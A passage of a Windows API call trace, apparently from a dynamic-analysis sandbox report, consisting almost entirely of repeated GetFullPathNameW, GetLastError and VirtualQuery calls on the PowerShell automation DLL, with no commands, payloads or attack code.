lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.658] GetLastError () returned 0x0 [0076.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.658] GetLastError () returned 0x0 [0076.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.658] GetLastError () returned 0x0 [0076.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.658] GetLastError () returned 0x0 [0076.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.658] GetLastError () returned 0x0 [0076.658] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.659] VirtualQuery (in: lpAddress=0xacb30, lpBuffer=0xadb30, dwLength=0x1c | out: lpBuffer=0xadb30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.659] GetLastError () returned 0x0 [0076.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.659] GetLastError () returned 0x0 [0076.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.659] GetLastError () returned 0x0 [0076.659] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.659] VirtualQuery (in: lpAddress=0xacb30, lpBuffer=0xadb30, dwLength=0x1c | out: lpBuffer=0xadb30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.659] GetLastError () returned 0x0 [0076.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.659] GetLastError () returned 0x0 [0076.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.659] GetLastError () returned 0x0 [0076.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.660] GetLastError () returned 0x0 [0076.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.660] GetLastError () returned 0x0 [0076.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.660] GetLastError () returned 0x0 [0076.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.660] GetLastError () returned 0x0 [0076.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.660] GetLastError () returned 0x0 [0076.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.660] GetLastError () returned 0x0 [0076.660] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.660] VirtualQuery (in: lpAddress=0xacb30, lpBuffer=0xadb30, dwLength=0x1c | out: lpBuffer=0xadb30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.661] GetLastError () returned 0x0 [0076.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.661] GetLastError () returned 0x0 [0076.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.661] GetLastError () returned 0x0 [0076.661] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.661] VirtualQuery (in: lpAddress=0xacb30, lpBuffer=0xadb30, dwLength=0x1c | out: lpBuffer=0xadb30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.661] GetLastError () returned 0x0 [0076.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.661] GetLastError () returned 0x0 [0076.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.661] GetLastError () returned 0x0 [0076.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.661] GetLastError () returned 0x0 [0076.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.661] GetLastError () returned 0x0 [0076.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.662] GetLastError () returned 0x0 [0076.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.662] GetLastError () returned 0x0 [0076.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.662] GetLastError () returned 0x0 [0076.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.662] GetLastError () returned 0x0 [0076.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.662] GetLastError () returned 0x0 [0076.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.662] GetLastError () returned 0x0 [0076.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.662] GetLastError () returned 0x0 [0076.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.662] GetLastError () returned 0x0 [0076.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.662] GetLastError () returned 0x0 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.663] GetLastError () returned 0x0 [0076.663] VirtualQuery (in: lpAddress=0xacf64, lpBuffer=0xadf64, dwLength=0x1c | out: lpBuffer=0xadf64*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.663] GetLastError () returned 0x0 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.663] GetLastError () returned 0x0 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.663] GetLastError () returned 0x0 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.663] GetLastError () returned 0x0 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.663] GetLastError () returned 0x0 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.663] GetLastError () returned 0x0 [0076.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.664] GetLastError () returned 0x0 [0076.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.664] GetLastError () returned 0x0 [0076.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.664] GetLastError () returned 0x0 [0076.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.664] GetLastError () returned 0x0 [0076.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.664] GetLastError () returned 0x0 [0076.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.664] GetLastError () returned 0x0 [0076.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.664] GetLastError () returned 0x0 [0076.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.664] GetLastError () returned 0x0 [0076.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.664] GetLastError () returned 0x0 [0076.665] VirtualQuery (in: lpAddress=0xacf64, lpBuffer=0xadf64, dwLength=0x1c | out: lpBuffer=0xadf64*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.665] GetLastError () returned 0x0 [0076.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.665] GetLastError () returned 0x0 [0076.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.665] GetLastError () returned 0x0 [0076.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.665] GetLastError () returned 0x0 [0076.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.665] GetLastError () returned 0x0 [0076.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.665] GetLastError () returned 0x0 [0076.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.665] GetLastError () returned 0x0 [0076.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, 